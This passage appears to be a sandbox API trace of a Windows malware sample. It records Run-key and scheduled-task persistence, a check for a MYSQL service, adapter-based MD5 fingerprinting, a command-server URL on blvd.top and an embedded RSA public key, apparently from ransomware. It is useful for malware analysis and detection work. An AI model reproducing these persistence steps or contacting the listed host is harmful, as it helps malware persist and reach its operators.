lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --AutoStart", lpcbData=0x18d538*=0x14c) returned 0x0 [0165.357] RegCloseKey (hKey=0x5a4) returned 0x0 [0165.357] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x150) returned 0x28ec00 [0165.357] lstrlenA (lpString="\" --AutoStart") returned 13 [0165.357] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x130) returned 0x3194750 [0165.357] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x28ec00 | out: hHeap=0x260000) returned 1 [0165.357] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned 1 [0165.357] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x130) returned 0x28ec00 [0165.357] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3194750 | out: hHeap=0x260000) returned 1 [0165.357] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x130) returned 0x3194750 [0165.357] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x130) returned 0x348e48 [0165.358] CoInitialize (pvReserved=0x0) returned 0x0 [0165.374] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0165.375] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x130) returned 0x2cde28 [0165.375] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18d544 | out: ppv=0x18d544*=0x28508b8) returned 0x0 [0165.385] TaskScheduler:ITaskService:Connect (This=0x28508b8, serverName=0x18cfd0*(varType=0x0, wReserved1=0x319, wReserved2=0x4748, wReserved3=0x319, varVal1=0x97, varVal2=0x130), user=0x18cfe0*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x138), domain=0x18cff0*(varType=0x0, wReserved1=0x0, wReserved2=0x130, wReserved3=0x0, varVal1=0x97, varVal2=0x7), password=0x18d000*(varType=0x0, wReserved1=0x31b, wReserved2=0xd4ec, wReserved3=0x18, varVal1=0x420cab, varVal2=0x260000)) returned 0x0 [0165.388] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x31b0e48 [0165.388] TaskScheduler:ITaskService:GetFolder (in: This=0x28508b8, Path="\\", ppFolder=0x18d54c | out: ppFolder=0x18d54c*=0x2850920) returned 0x0 [0165.392] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b0e48 | out: hHeap=0x260000) returned 1 [0165.392] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x31b0e48 [0165.392] ITaskFolder:DeleteTask (This=0x2850920, Name="Time Trigger Task", flags=0) returned 0x0 [0165.509] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b0e48 | out: hHeap=0x260000) returned 1 [0165.509] TaskScheduler:ITaskService:NewTask (in: This=0x28508b8, flags=0x0, ppDefinition=0x18d550 | out: ppDefinition=0x18d550*=0x2850950) returned 0x0 [0165.510] TaskScheduler:IUnknown:Release (This=0x28508b8) returned 0x1 [0165.510] ITaskDefinition:get_RegistrationInfo (in: This=0x2850950, ppRegistrationInfo=0x18d524 | out: ppRegistrationInfo=0x18d524*=0x2850a10) returned 0x0 [0165.510] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x31b0e78 [0165.510] IRegistrationInfo:put_Author (This=0x2850a10, Author="Author Name") returned 0x0 [0165.510] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b0e78 | out: hHeap=0x260000) returned 1 [0165.510] IUnknown:Release (This=0x2850a10) returned 0x1 [0165.510] ITaskDefinition:get_Principal (in: This=0x2850950, ppPrincipal=0x18d52c | out: ppPrincipal=0x18d52c*=0x2850ba0) returned 0x0 [0165.511] IPrincipal:put_LogonType (This=0x2850ba0, LogonType=3) returned 0x0 [0165.511] IUnknown:Release (This=0x2850ba0) returned 0x1 [0165.511] ITaskDefinition:get_Settings (in: This=0x2850950, ppSettings=0x18d534 | out: ppSettings=0x18d534*=0x2850ac0) returned 0x0 [0165.511] ITaskSettings:put_StartWhenAvailable (This=0x2850ac0, StartWhenAvailable=1) returned 0x0 [0165.511] IUnknown:Release (This=0x2850ac0) returned 0x1 [0165.511] ITaskSettings:get_IdleSettings (in: This=0x2850ac0, ppIdleSettings=0x18d518 | out: ppIdleSettings=0x18d518*=0x2850b30) returned 0x0 [0165.511] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x31b0e78 [0165.511] IIdleSettings:put_WaitTimeout (This=0x2850b30, WaitTimeout="PT5M") returned 0x0 [0165.512] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b0e78 | out: hHeap=0x260000) returned 1 [0165.512] IUnknown:Release (This=0x2850b30) returned 0x1 [0165.512] ITaskDefinition:get_Triggers (in: This=0x2850950, ppTriggers=0x18d514 | out: ppTriggers=0x18d514*=0x2850a80) returned 0x0 [0165.512] ITriggerCollection:Create (in: This=0x2850a80, Type=1, ppTrigger=0x18d520 | out: ppTrigger=0x18d520*=0x2850c00) returned 0x0 [0165.512] IUnknown:Release (This=0x2850a80) returned 0x1 [0165.512] IUnknown:QueryInterface (in: This=0x2850c00, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18d53c | out: ppvObject=0x18d53c*=0x2850c00) returned 0x0 [0165.512] IUnknown:Release (This=0x2850c00) returned 0x2 [0165.512] ITrigger:get_Repetition (in: This=0x2850c00, ppRepeat=0x18d528 | out: ppRepeat=0x18d528*=0x2850c50) returned 0x0 [0165.512] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x31b0e78 [0165.512] IRepetitionPattern:put_Interval (This=0x2850c50, Interval="PT5M") returned 0x0 [0165.512] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b0e78 | out: hHeap=0x260000) returned 1 [0165.512] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x31b0e78 [0165.513] IRepetitionPattern:put_Duration (This=0x2850c50, Duration="") returned 0x0 [0165.513] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b0e78 | out: hHeap=0x260000) returned 1 [0165.513] ITrigger:put_Repetition (This=0x2850c00, Repetition=0x2850c50) returned 0x0 [0165.513] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x31b0e78 [0165.513] ITrigger:put_Id (This=0x2850c00, Id="Trigger1") returned 0x0 [0165.513] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b0e78 | out: hHeap=0x260000) returned 1 [0165.513] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x31b0e78 [0165.513] ITrigger:put_EndBoundary (This=0x2850c00, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0165.513] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b0e78 | out: hHeap=0x260000) returned 1 [0165.513] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18cffc | out: lpSystemTimeAsFileTime=0x18cffc*(dwLowDateTime=0x9b3af040, dwHighDateTime=0x1d60e72)) [0165.521] GetLastError () returned 0x0 [0165.521] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x1 [0165.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18cf64 | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18cf64) returned 26 [0165.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18cf64 | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18cf64) returned 26 [0165.523] GetLastError () returned 0x0 [0165.523] ITrigger:put_StartBoundary (This=0x2850c00, StartBoundary="2020-04-09T23:29:14") returned 0x0 [0165.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b0e78 | out: hHeap=0x260000) returned 1 [0165.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31a9d50 | out: hHeap=0x260000) returned 1 [0165.523] IUnknown:Release (This=0x2850c00) returned 0x1 [0165.523] ITaskDefinition:get_Actions (in: This=0x2850950, ppActions=0x18d530 | out: ppActions=0x18d530*=0x28509c8) returned 0x0 [0165.523] IActionCollection:Create (in: This=0x28509c8, Type=0, ppAction=0x18d51c | out: ppAction=0x18d51c*=0x2850c98) returned 0x0 [0165.524] IUnknown:Release (This=0x28509c8) returned 0x1 [0165.524] IUnknown:QueryInterface (in: This=0x2850c98, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18d538 | out: ppvObject=0x18d538*=0x2850c98) returned 0x0 [0165.524] IUnknown:Release (This=0x2850c98) returned 0x2 [0165.524] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x31b0e78 [0165.524] IExecAction:put_Path (This=0x2850c98, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\0cf16e90-25f3-4a59-b809-8330957d8bce\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe") returned 0x0 [0165.524] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b0e78 | out: hHeap=0x260000) returned 1 [0165.524] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x31b0e78 [0165.524] IExecAction:put_Arguments (This=0x2850c98, Arguments="--Task") returned 0x0 [0165.524] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b0e78 | out: hHeap=0x260000) returned 1 [0165.524] IUnknown:Release (This=0x2850c98) returned 0x1 [0165.524] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xc) returned 0x31b0e78 [0165.524] ITaskFolder:RegisterTaskDefinition (in: This=0x2850920, Path="Time Trigger Task", pDefinition=0x2850950, flags=6, UserId=0x18cfd8*(varType=0x0, wReserved1=0x31b, wReserved2=0xd4ec, wReserved3=0x18, varVal1=0x420cab, varVal2=0x260000), password=0x18cfe8*(varType=0x0, wReserved1=0x0, wReserved2=0x130, wReserved3=0x0, varVal1=0x97, varVal2=0x7), LogonType=3, sddl=0x18cffc*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0x138), ppTask=0x18d504 | out: ppTask=0x18d504*=0x2850d18) returned 0x0 [0165.608] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b0e78 | out: hHeap=0x260000) returned 1 [0165.609] TaskScheduler:IUnknown:Release (This=0x2850920) returned 0x0 [0165.609] TaskScheduler:IUnknown:Release (This=0x2850950) returned 0x0 [0165.609] IUnknown:Release (This=0x2850d18) returned 0x0 [0165.609] CoUninitialize () [0165.610] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2cde28 | out: hHeap=0x260000) returned 1 [0165.610] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x348e48 | out: hHeap=0x260000) returned 1 [0165.610] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3194750 | out: hHeap=0x260000) returned 1 [0165.610] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x2b6d40 [0165.611] OpenServiceW (hSCManager=0x2b6d40, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0165.611] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31abf78 [0165.611] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31a9080 [0165.611] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31a89e0 [0165.611] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31a9520 [0165.611] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31a9788 [0165.611] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31a99f0 [0165.611] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31a9c58 [0165.611] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c5fe0 [0165.611] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c6248 [0165.611] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c64b0 [0165.612] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c6718 [0165.612] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c6980 [0165.612] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c6be8 [0165.612] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c6e50 [0165.612] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c70b8 [0165.612] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c7320 [0165.612] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c7588 [0165.612] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa0) returned 0x31d458 [0165.612] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x110) returned 0x31a8c48 [0165.612] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31d458 | out: hHeap=0x260000) returned 1 [0165.612] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x110) returned 0x3194750 [0165.612] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x31b1200, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0x7fc) returned 0x5b4 [0165.899] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31a8c48 | out: hHeap=0x260000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x31e3080 [0165.899] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c77f0 [0165.899] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c7a58 [0165.899] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c7cc0 [0165.899] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c7f28 [0165.899] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c8190 [0165.899] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c83f8 [0165.899] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c8660 [0165.899] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c88c8 [0165.899] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c8b30 [0165.899] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c8d98 [0165.899] lstrlenA (lpString="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php") returned 46 [0165.899] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x5e) returned 0x304148 [0165.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c77f0, cbMultiByte=-1, lpWideCharStr=0x304148, cchWideChar=47 | out: lpWideCharStr="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php") returned 47 [0165.900] lstrcatW (in: lpString1="", lpString2="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php" | out: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php" [0165.900] lstrlenA (lpString="") returned 0 [0165.900] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2) returned 0x3142688 [0165.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c7a58, cbMultiByte=-1, lpWideCharStr=0x3142688, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0165.900] lstrcatW (in: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php" [0165.900] lstrlenA (lpString="") returned 0 [0165.900] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2) returned 0x3142658 [0165.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c7cc0, cbMultiByte=-1, lpWideCharStr=0x3142658, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0165.900] lstrcatW (in: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php" [0165.900] lstrlenA (lpString="") returned 0 [0165.900] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2) returned 0x31426f8 [0165.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c7f28, cbMultiByte=-1, lpWideCharStr=0x31426f8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0165.900] lstrcatW (in: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php" [0165.900] lstrlenA (lpString="") returned 0 [0165.900] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2) returned 0x31426a8 [0165.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c8190, cbMultiByte=-1, lpWideCharStr=0x31426a8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0165.900] lstrcatW (in: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php" [0165.900] lstrlenA (lpString="") returned 0 [0165.900] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2) returned 0x31426b8 [0165.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c83f8, cbMultiByte=-1, lpWideCharStr=0x31426b8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0165.900] lstrcatW (in: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php" [0165.901] lstrlenA (lpString="") returned 0 [0165.901] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2) returned 0x3142718 [0165.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c8660, cbMultiByte=-1, lpWideCharStr=0x3142718, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0165.901] lstrcatW (in: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php" [0165.901] lstrlenA (lpString="") returned 0 [0165.912] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2) returned 0x31426c8 [0165.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c88c8, cbMultiByte=-1, lpWideCharStr=0x31426c8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0165.912] lstrcatW (in: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php" [0165.912] lstrlenA (lpString="") returned 0 [0165.912] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2) returned 0x31426d8 [0165.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c8b30, cbMultiByte=-1, lpWideCharStr=0x31426d8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0165.912] lstrcatW (in: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php" [0165.912] lstrlenA (lpString="") returned 0 [0165.912] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2) returned 0x31426e8 [0165.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c8d98, cbMultiByte=-1, lpWideCharStr=0x31426e8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0165.912] lstrcatW (in: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://blvd.top/ydtftysdtyftysdfsdpen3/get.php" [0165.912] lstrlenW (lpString="") returned 0 [0165.912] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x12) returned 0x283100 [0165.912] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x288) returned 0x31a9ec0 [0165.913] GetAdaptersInfo (in: AdapterInfo=0x31a9ec0, SizePointer=0x18d51c | out: AdapterInfo=0x31a9ec0, SizePointer=0x18d51c) returned 0x0 [0166.085] GetAdaptersInfo (in: AdapterInfo=0x31a9ec0, SizePointer=0x18d51c | out: AdapterInfo=0x31a9ec0, SizePointer=0x18d51c) returned 0x0 [0166.098] GetLastError () returned 0x0 [0166.098] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1000) returned 0x31b67c8 [0166.098] GetLastError () returned 0x0 [0166.107] GetLastError () returned 0x0 [0166.277] CryptAcquireContextW (in: phProv=0x18d4ec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d4ec*=0x2be810) returned 1 [0166.325] CryptCreateHash (in: hProv=0x2be810, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d4f4 | out: phHash=0x18d4f4) returned 1 [0166.326] CryptHashData (hHash=0x31cae60, pbData=0x31f6d30, dwDataLen=0x11, dwFlags=0x0) returned 1 [0166.326] CryptGetHashParam (in: hHash=0x31cae60, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d4f0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d4f0) returned 1 [0166.326] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x11) returned 0x31825d8 [0166.326] CryptGetHashParam (in: hHash=0x31cae60, dwParam=0x2, pbData=0x31825d8, pdwDataLen=0x18d4f0, dwFlags=0x0 | out: pbData=0x31825d8, pdwDataLen=0x18d4f0) returned 1 [0166.326] GetLastError () returned 0x0 [0166.326] CryptDestroyHash (hHash=0x31cae60) returned 1 [0166.326] CryptReleaseContext (hProv=0x2be810, dwFlags=0x0) returned 1 [0166.326] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f6d30 | out: hHeap=0x260000) returned 1 [0166.326] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x318f448 [0166.326] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x318f410 | out: hHeap=0x260000) returned 1 [0166.326] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f6c90 | out: hHeap=0x260000) returned 1 [0166.326] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0xa5c) returned 0x5d8 [0166.657] WaitForSingleObject (hHandle=0x5d8, dwMilliseconds=0xffffffff) returned 0x0 [0167.624] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x5ec [0167.626] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x31e3440 [0167.664] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c9000 [0167.664] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c9268 [0167.664] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c94d0 [0167.664] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c9738 [0167.664] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c99a0 [0167.664] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31c9c08 [0167.664] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31de7e0 [0167.664] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31dea48 [0167.664] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31decb0 [0167.664] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31def18 [0167.664] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x3e0) returned 0x31b7cc0 [0167.664] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x5ef) returned 0x31b80a8 [0167.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x31b80a8, cbMultiByte=1519, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC 